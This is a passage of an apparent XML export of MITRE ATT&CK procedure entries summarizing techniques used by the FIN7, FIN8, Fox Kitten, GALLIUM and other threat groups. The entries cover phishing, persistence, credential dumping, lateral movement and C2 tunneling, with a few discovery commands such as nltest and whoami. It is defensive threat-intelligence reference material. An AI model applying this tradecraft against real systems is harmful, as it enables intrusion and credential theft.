    <t>[FIN7](https://attack.mitre.org/groups/G0046) used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used Kerberoasting for credential access and to enable lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.(Citation: FireEye FIN7 April 2017)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has developed malware for use in operations, including the creation of infected removable media.(Citation: FBI Flash FIN7 USB)(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has created a scheduled task named “AdobeFlashSync” to establish persistence.(Citation: Morphisec FIN7 June 2017)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has attempted to run Darkside ransomware with the filename sleep.exe.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN7](https://attack.mitre.org/groups/G0046) has used RDP to move laterally in victim environments.(Citation: CrowdStrike Carbon Spider August 2021)
</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used SSH to move laterally through victim environments.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) malware has created scheduled tasks to establish persistence.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) captured screenshots and desktop video recordings.(Citation: DOJ FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.(Citation: FireEye FIN7 April 2017)(Citation: DOJ FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has conducted broad phishing campaigns using malicious links.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used TightVNC to control compromised hosts.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has harvested valid administrative credentials for lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) created a custom video recording capability that could be used to monitor operations in the victim's environment.(Citation: FireEye FIN7 Aug 2018)(Citation: DOJ FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used VBS scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN7](https://attack.mitre.org/groups/G0046) used the command prompt to launch commands on the victim’s machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019) </t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used WMI to install malware on targeted systems.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) created new Windows services and added them to the startup directories for persistence.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used RAR to compress collected data before exfiltration.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used the Plink utility to tunnel RDP back to C2 infrastructure.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has injected malicious code into a new svchost.exe process.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has cleared logs during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has retrieved a list of trusted domains by using &lt;code&gt;[Nltest](https://attack.mitre.org/software/S0359).exe /domain_trusts&lt;/code&gt;.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used FTP to exfiltrate collected data.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has exploited the CVE-2016-0167 local vulnerability.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has deleted tmp and prefetch files during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used remote code execution to download subsequent payloads.(Citation: FireEye Fin8 May 2016)(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used malicious e-mail attachments to lure victims into executing malware.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used emails with malicious links to lure victims into installing malware.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has deleted Registry keys during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used environment variables and standard input (stdin) to obfuscate command-line arguments. [FIN8](https://attack.mitre.org/groups/G0061) also obfuscates malicious macros delivered as payloads.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061)'s malicious spearphishing payloads are executed as [PowerShell](https://attack.mitre.org/techniques/T1059/001). [FIN8](https://attack.mitre.org/groups/G0061) has also used [PowerShell](https://attack.mitre.org/techniques/T1059/001) for lateral movement and credential access.(Citation: FireEye Obfuscation June 2017)(Citation: Bitdefender FIN8 July 2021)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) aggregates staged data from a network into a single location.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used RDP for lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used [dsquery](https://attack.mitre.org/software/S0105) and other Active Directory utilities to enumerate hosts; they have also used &lt;code&gt;nltest.exe /dclist&lt;/code&gt; to retrieve a list of domain controllers.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used scheduled tasks to maintain RDP backdoors.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used Registry keys to detect and avoid executing in potential sandboxes.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has distributed targeted emails containing Word documents with embedded malicious macros.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has distributed targeted emails containing links to malicious documents with embedded macros.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used a malicious framework designed to impersonate the lsass.exe/vmtoolsd.exe token.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used valid accounts for persistence and lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used HTTPS for command and control.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used &lt;code&gt;sslip.io&lt;/code&gt;, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used a Batch file to automate frequently executed post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016) [FIN8](https://attack.mitre.org/groups/G0061) has also executed commands remotely via [cmd](https://attack.mitre.org/software/S0106).(Citation: FireEye Obfuscation June 2017)(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061)'s malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. [FIN8](https://attack.mitre.org/groups/G0061) has also used WMIC for lateral movement as well as during and post compromise cleanup activities.(Citation: FireEye Obfuscation June 2017)(Citation: Bitdefender FIN8 July 2021)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used WMI event subscriptions for persistence.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has acquired domains imitating legitimate sites.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has named malicious files &lt;code&gt;update.exe&lt;/code&gt; and loaded them into the compromise host's “Public” folder.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has obtained open source tools for its operations, including JsonCPP and Psiphon.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used sticky keys to launch a command prompt.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used 7-Zip to archive data.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Google Chrome bookmarks to identify internal resources and assets.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has brute forced RDP credentials.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Perl reverse shell to communicate with C2.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed files to gain valid credentials.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has obtained files from the victim's cloud storage instances.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed victim security and IT environments and Microsoft Teams to mine valuable information.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has searched local system resources to access sensitive documents.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has searched network shares to access sensitive documents.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the Softerra LDAP browser to browse documentation on service accounts.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has created KeyBase accounts to communicate with ransomware victims.(Citation: ClearSky Pay2Kitten December 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Dragos PARISITE )(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has exploited known vulnerabilities in remote services including RDP.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used WizTree to obtain network files and directory listings.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) directly to endpoints.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used prodump to dump credentials from LSASS.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed ntuser.dat and UserClass.dat on compromised hosts.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has created a local user account with administrator privileges.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has named the task for a reverse proxy lpupdate to appear legitimate.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has named binaries and configuration files svhost and dllhost respectively to appear legitimate.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Volume Shadow Copy to access credential information from NTDS.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used tools including NMAP to conduct broad scanning to identify open ports.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has base64 encoded scripts and payloads to avoid detection.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used scripts to access credential information from the KeePass database.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used PowerShell scripts to access credential data.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as [Ngrok](https://attack.mitre.org/software/S0508) and custom tool SSHMinion.(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed Registry hives ntuser.dat and UserClass.dat.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used RDP to log in and move laterally in the target environment.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Angry IP Scanner to detect remote systems.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used valid accounts to access SMB shares.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used the PuTTY and Plink tools for lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Twitter account to communicate with ransomware victims.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has installed TightVNC server and client on compromised servers and endpoints for lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used valid credentials with various services during lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Amazon Web Services to host C2.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has installed web shells on compromised hosts to maintain access.(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used cmd.exe likely as a password changing mechanism.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used WinRAR to compress and encrypt stolen data prior to exfiltration.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used stolen certificates to sign its tools including those from Whizzimo LLC.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used DLL side-loading to covertly load [PoisonIvy](https://attack.mitre.org/software/S0012) into memory on the victim machine.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) collected data from the victim's local system, including password hashes from the SAM hive in the Registry.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) created high-privileged domain user accounts to maintain access to victim networks.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used Web shells and [HTRAN](https://attack.mitre.org/software/S0040) for C2 and to exfiltrate data.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [HTRAN](https://attack.mitre.org/software/S0040) to redirect connections between networks.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) ensured each payload had a unique hash, including by using different types of packers.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and [HTRAN](https://attack.mitre.org/software/S0040).(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) along with a PowerShell-based [Mimikatz](https://attack.mitre.org/software/S0002) to dump credentials on the victim machines.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used [PsExec](https://attack.mitre.org/software/S0029) to move laterally between hosts in the target network.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [HTRAN](https://attack.mitre.org/software/S0040) in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used dumped hashes to authenticate to other machines via pass the hash.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a modified version of [NBTscan](https://attack.mitre.org/software/S0590) to identify available NetBIOS name servers over the network as well as &lt;code&gt;ping&lt;/code&gt; to identify remote systems.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used a renamed cmd.exe file to evade detection.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) established persistence for [PoisonIvy](https://attack.mitre.org/software/S0012) by created a scheduled task.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;reg&lt;/code&gt; commands to dump specific hives from the Windows Registry, such as the SAM hive, and obtain password hashes.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used Taiwan-based servers that appear to be exclusive to [GALLIUM](https://attack.mitre.org/groups/G0093).(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) packed some payloads using different types of packers, both known and custom.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;ipconfig /all&lt;/code&gt; to obtain information about the victim network configuration. The group also ran a modified version of [NBTscan](https://attack.mitre.org/software/S0590) to identify available NetBIOS name servers.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;netstat -oan&lt;/code&gt; to obtain information about the victim network connections.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used &lt;code&gt;whoami&lt;/code&gt; and &lt;code&gt;query user&lt;/code&gt; to obtain information about the victim user.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) has used a variety of widely-available tools, which in some cases they modified to add functionality and/or subvert antimalware solutions.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) leveraged valid accounts to maintain access to a victim network.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used Web shells to persist in victim environments and assist in execution and exfiltration.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used the Windows command shell to execute commands.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>[GCMAN](https://attack.mitre.org/groups/G0036) uses Putty for lateral movement.(Citation: Securelist GCMAN)</t>
  </si>
  <si>
    <t>[GCMAN](https://attack.mitre.org/groups/G0036) uses VNC for lateral movement.(Citation: Securelist GCMAN)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has exploited Oracle WebLogic vulnerabilities for initial compromise.(Citation: Secureworks REvil September 2019)</t>
  </si>
  <si>
